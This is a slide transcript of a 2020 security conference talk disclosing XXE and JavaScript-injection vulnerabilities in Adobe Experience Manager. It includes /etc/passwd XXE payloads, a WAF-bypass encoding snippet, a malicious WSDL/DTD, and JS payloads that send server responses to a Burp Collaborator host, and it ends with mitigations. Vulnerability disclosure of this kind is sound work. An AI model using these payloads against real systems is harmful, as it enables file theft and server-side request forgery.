Upgrade to Pro — share decks privately, control downloads, hide ads and more …

A Hacker's perspective on AEM applications security

Mikhail Egorov
September 30, 2020

A Hacker's perspective on AEM applications security

Adobe Experience Manager (AEM), is a comprehensive content management solution for building websites, managing marketing content and assets. I started to look into AEM security back in 2015. Since then I discovered and reported several server-side vulnerabilities and developed toolset for AEM hacking to automate security testing of AEM web-applications.

In 2019 I reported one code injection and three XML external entity (XXE) vulnerabilities to Adobe PSIRT. They are known as CVE-2019-8086, CVE-2019-8087, CVE-2019-8088. These vulnerabilities allow anonymous attackers to compromise AEM web-application.

In the talk, I will disclose details of discovered vulnerabilities and exploitation techniques.

Mikhail Egorov

September 30, 2020
Tweet

More Decks by Mikhail Egorov

Other Decks in Programming

Transcript

  1. EUROPE'S LEADING AEM DEVELOPER CONFERENCE
    28th – 30th SEPTEMBER 2020
    A Hacker's perspective on AEM applications security
    Mikhail Egorov, Security researcher & bug hunter

    View full-size slide

  2. whoami
    3
    ▪ Security researcher & full-time bug hunter
    ▪ https://bugcrowd.com/0ang3el
    ▪ https://hackerone.com/0ang3el
    ▪ Conference speaker
    ▪ https://www.slideshare.net/0ang3el
    ▪ https://speakerdeck.com/0ang3el

    View full-size slide

  3. whoami
    4
    ▪ Toolset for AEM hacking
    ▪ https://github.com/0ang3el/aem-hacker

    View full-size slide

  4. APSB19-48
    6
    ▪ http://helpx.adobe.com/security/products/experi
    ence-manager/apsb19-48.html
    ▪ CVE-2019-8086 / XML eXternal Entity Injection
    ▪ CVE-2019-8087 / XML eXternal Entity Injection
    ▪ CVE-2019-8088 / JavaScript Code Injection

    View full-size slide

  5. XML eXternal Entity (XXE) attacks
    7
    ▪ Do we see the parsed XML?
    ▪ What’s allowed by the XML parser?
    ▪ General external entities
    ▪ Parameter external entities
    ▪ External DTD loading

    View full-size slide

  6. XML eXternal Entity (XXE) attacks
    8


    ]>
    &xxe;
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync …

    View full-size slide

  7. XML eXternal Entity (XXE) attacks
    9


    %xxe;
    ]>

    View full-size slide

  8. XML eXternal Entity (XXE) attacks
    10



    View full-size slide

  9. CVE-2019-8086
    11
    ▪ GuideInternalSubmitServlet
    @Service({Servlet.class})
    @Properties({@Property(
    name = "sling.servlet.resourceTypes",
    value = {"fd/af/components/guideContainer"}
    ), @Property(
    name = "sling.servlet.methods",
    value = {"POST"}
    ), @Property(
    name = "sling.servlet.selectors",
    value = {"af.internalsubmit"}
    )})
    public class GuideInternalSubmitServlet

    View full-size slide

  10. CVE-2019-8086
    12

    View full-size slide

  11. CVE-2019-8086
    13

    View full-size slide

  12. CVE-2019-8086
    14
    ▪ XXE payload


    ]>
    &a;

    View full-size slide

  13. CVE-2019-8086
    15

    View full-size slide

  14. CVE-2019-8086
    16
    ▪ Exploitation hints
    ▪ We can JSON-encode XXE payload to bypass a WAF
    ▪ In Java we can list directory content
    ▪ /proc/self/cwd

    View full-size slide

  15. CVE-2019-8086
    17
    ▪ JSON-encoding
    data = 'a SYSTEM "file:///etc/passwd">]>&a;'
    result = "“
    for c in data:
    result = result + "\\u00%02x" % ord(c)
    print result

    View full-size slide

  16. CVE-2019-8086
    18

    View full-size slide

  17. CVE-2019-8086
    19
    ▪ XXE payload


    ]>
    &a;

    View full-size slide

  18. CVE-2019-8086
    20

    View full-size slide

  19. CVE-2019-8086
    21
    ▪ Exploitation requirements
    ▪ There should be a node with
    fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/comp
    onents/guideContainer
    ▪ Attacker should have a jcr:write access
    somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

    View full-size slide

  20. CVE-2019-8086
    22
    ▪ Exploitation requirements
    ▪ Doesn’t work equally on different AEM versions
    ▪ Only blind SSRF for some versions



    View full-size slide

  21. CVE-2019-8087
    23
    ▪ WSDLInvokerServlet
    @Service({Servlet.class})
    @Properties({@Property(
    name = "sling.servlet.resourceTypes",
    value = {"fd/af/components/guideContainer"}
    ), @Property(
    name = "sling.servlet.selectors",
    value = {"af.wsdl"}
    ), @Property(
    name = "sling.servlet.methods",
    value = {"POST"}
    )})
    public class WSDLInvokerServlet

    View full-size slide

  22. CVE-2019-8087
    24

    View full-size slide

  23. CVE-2019-8087
    25

    View full-size slide

  24. CVE-2019-8087
    26
    ▪ WSDL example
    ▪ https://cs.au.dk/~amoeller/WWW/webservices/wsdlexample.html

    View full-size slide

  25. CVE-2019-8087
    27

    View full-size slide

  26. CVE-2019-8087
    28
    ▪ Malicious xxe.wsdl


    %dtd;
    %param1;
    ]>




    View full-size slide

  27. CVE-2019-8087
    29
    ▪ Malicious loot.dtd

    ">

    View full-size slide

  28. CVE-2019-8087
    30

    View full-size slide

  29. CVE-2019-8087
    31
    ▪ Exploitation requirements
    ▪ There should be a node with
    fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/comp
    onents/guideContainer
    ▪ Attacker should have a jcr:write access
    somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

    View full-size slide

  30. CVE-2019-8087
    32
    ▪ Exploitation requirements
    ▪ Doesn’t work equally on different AEM versions
    ▪ On some AEM versions WSDLInvokerServlet is not
    present

    View full-size slide

  31. CVE-2019-8088
    33
    ▪ GuideSubmitServlet
    @Service({Servlet.class})
    @Properties({@Property(
    name = "sling.servlet.resourceTypes",
    value = {"fd/af/components/guideContainer"}
    ), @Property(
    name = "sling.servlet.methods",
    value = {"POST"}
    ), @Property(
    name = "sling.servlet.selectors",
    value = {"af.submit", "af.agreement", "af.signSubmit"}
    )})
    public class GuideSubmitServlet extends SlingAllMethodsServlet {

    View full-size slide

  32. CVE-2019-8088
    34

    View full-size slide

  33. CVE-2019-8088
    35

    View full-size slide

  34. CVE-2019-8088
    36

    View full-size slide

  35. CVE-2019-8088
    37

    View full-size slide

  36. CVE-2019-8088
    38

    View full-size slide

  37. CVE-2019-8088
    39
    ▪ Sandboxed Rhino engine on some AEM versions
    ▪ No RCE
    ▪ Sandbox allows network interactions
    ▪ SSRF w/ ability to see the response

    View full-size slide

  38. CVE-2019-8088
    40
    ▪ JS payload
    ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo
    rator.net');//

    View full-size slide

  39. CVE-2019-8088
    41

    View full-size slide

  40. CVE-2019-8088
    42

    View full-size slide

  41. CVE-2019-8088
    43
    ▪ JS payload
    ');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo
    rator.net',function(data){jQuery.get('http://727a14ifhq8on9vakss
    k6agtlkrafz.burpcollaborator.net',{loot:data})});//

    View full-size slide

  42. CVE-2019-8088
    44

    View full-size slide

  43. CVE-2019-8088
    45

    View full-size slide

  44. CVE-2019-8088
    46
    ▪ Exploitation requirements
    ▪ There should be a node with
    fd/af/components/guideContainer resource type
    ▪ property=sling:resourceType&property.value=fd/af/comp
    onents/guideContainer
    ▪ Attacker should have a jcr:write access
    somewhere
    ▪ /content/usergenerated/etc/commerce/smartlists/

    View full-size slide

  45. CVE-2019-8088
    47
    ▪ Exploitation requirements
    ▪ Doesn’t work equally on different AEM versions
    ▪ RCE or SSRF

    View full-size slide

  46. APSB19-48
    48
    ▪ Keep AEM up to date
    ▪ http://helpx.adobe.com/security/products/experie
    nce-manager/apsb19-48.html
    ▪ Block jcr:write access for anonymous user
    ▪ /content/usergenerated/etc/commerce/smartlists/
    ▪ Remove demo content (Geometrixx, WeRetail, …)

    View full-size slide

  47. 49
    Thank you
    @0ang3el

    View full-size slide